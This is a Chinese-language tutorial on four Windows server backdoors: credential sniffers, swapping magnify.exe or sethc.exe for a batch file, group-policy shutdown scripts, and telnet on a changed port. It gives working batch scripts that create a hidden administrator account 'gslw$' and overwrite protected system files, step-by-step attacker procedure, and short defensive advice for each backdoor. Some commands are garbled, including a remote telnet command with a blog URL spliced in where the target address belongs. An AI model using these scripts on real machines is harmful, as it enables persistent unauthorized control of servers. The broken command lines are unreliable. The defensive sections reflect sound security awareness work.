1、嗅探欺骗,最危险的后门
这类后门是攻击者在控制了主机之后,并不创建新的帐户而是在主机上安装嗅探工具窃取管理员的密码。由于此类后门,并不创建新的帐户而是通过嗅探获取的管理员密码登录系统,因此隐蔽性极高,如果管理员安全意识不高并缺少足够的安全技能的话是根本发现不了的。
(1).安装嗅探工具
攻击者将相应的嗅探工具上传或者下载到服务器,然后安装即可。需要说明的是这些嗅探工具一般体积很小并且功能单一,但是往往被做成驱动形式的,所以隐蔽性极高,很难发现也不宜清除。
(2).获取管理员密码
嗅探工具对系统进行实施监控,当管理员登录服务器时其密码也就被窃取,然后嗅探工具会将管理员密码保存到一个txt文件中。当攻击者下一次登录服务器后,就可以打开该txt文件获取管理员密码。此后他登录服务器就再不用重新创建帐户而是直接用合法的管理员帐户登录服务器。如果服务器是一个Web,攻击者就会将该txt文件放置到某个web目录下,然后在本地就可以浏览查看该文件了。(图1)
(3).防范措施
嗅探后门攻击者以正常的管理员帐户登录系统,因此很难发现,不过任何入侵都会留下蛛丝马迹,我们可以启用组策略中的“审核策略”使其对用户的登录情况进行记录,然后通过事件查看器查看是否有可疑时间的非法登录。不过,一个高明的攻击者他们会删除或者修改系统日志,因此最彻底的措施是清除安装在系统中的嗅探工具,然后更改管理员密码。
2、放大镜程序,最狡猾的后门
放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服务器的目的。
通常情况下,攻击者通过构造的magnify.exe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是:
(1).构造批处理脚本
@echo off
net user gslw$ test168 /add
net localgroup administrators gslw$ /add
%Windir%\system32\nagnify.exe
exit
将上面的脚本保存为magnify.bat,其作用是创建一个密码为test168的管理员用户gslw$,最后运行改名后的放大镜程序nagnify.exe。(图2)
(2).文件格式转换
因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。
打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com,继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。(图3)
(3).放大镜文件替换
下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%\system32\dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。
@echo off
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
copy %Windir%\system32\magnify.exe nagnify.exe
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
replace.exe %Windir%\magnify.exe %Windir%\system32
exit
上面批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换。(图4)
(4).攻击利用
当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器,在登录界面窗口摁下本地键盘的“Win+U”组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具,然后攻击者就开业通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与该帐户相关的信息,以防被管理员发现。(图5)
(5).防范措施
进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe,然后运行lusrmgr.msc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个magnify.exe,通过其警告攻击者或者进行入侵监控和取证。
补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.exe换成了sethc.exe。
3、组策略欺骗,最隐蔽的后门
相对来说,组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性,因此常常被攻击者利用来做服务器后门。
攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本,最简单的比如创建一个管理员用户,他可以这样做:
(1).创建脚本
创建一个批处理文件add.bat,add.bat的内容是:@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (创建一个用户名为gslw$密码为test168的管理员用户)。
(2).后门利用
在“运行”对话框中输入gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户,就是他看见并且删除了该帐户,当系统关机时又会创建该帐户。所以说,如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。
其实,对于组策略中的这个“后门”还有很多利用法,攻击者通过它来运行脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不用在系统中创建帐户了,直接利用管理员帐户远程登录系统。因此它也是“双刃剑”,希望大家重视这个地方。当你为服务器被攻击而莫名其妙时,说不定攻击者就是通过它实现的。(图6)
4、telnet欺骗,最容易被忽略的后门
telnet是命令行下的远程登录工具,不过在服务器管理时使用不多也常为管理员所忽视。攻击者如果在控制一台服务器后,开启“远程桌面”进行远程控制非常容易被管理员察觉,但是启动Telnet进行远程控制却不容易被察觉。不过,telnet的默认端口是23,如果开启后,别人是很容易扫描到的,因此攻击者会更改telnet的端口,从而独享该服务器的控制权。
(1).修改端口
本地修改Windows 2003服务器的telnet端口的方法是:“开始→运行”输入cmd打开命令提示符,然后运行命令“tlntadmn config port=800”(800是修改后的telnet端口,为了避免端口冲突不用设置成已知服务的端口。) 当然,我们也可以远程修改服务器的telnet端口,在命令提示符下输入命令“tlntadmn config http://www.cnblogs.com/leivo/admin/file://192.168.1.9/ port=800 -u gslw -p test168 ”(http://www.cnblogs.com/leivo/admin/file://192.168.1.9/对方IP,port=800要修改为的telnet端口,-u指定对方的用户名,-p指定对方用户的密码。)(图7)
(2).远程登录
攻击者在本地运行命令提示符(cmd.exe)输入命令“telnet 192.168.1.9 800”然后输入用户名及其密码记录telnet到服务器。
(3).防范措施
对于telnet后门的方法非常简单,可以通过“tlntadmn config port=n”命令更改其端口,更彻底的运行“services.msc”打开服务管理器,禁用telnet服务。(图8)
总结:其实,不管什么样的后门都有一个共同的特点——隐蔽性,是见不得阳光的。只要大家掌握一定的系统技术,并时刻提高警惕就能让后门显形。知己知彼,了解后门的原理,就能够从根本上终结后门。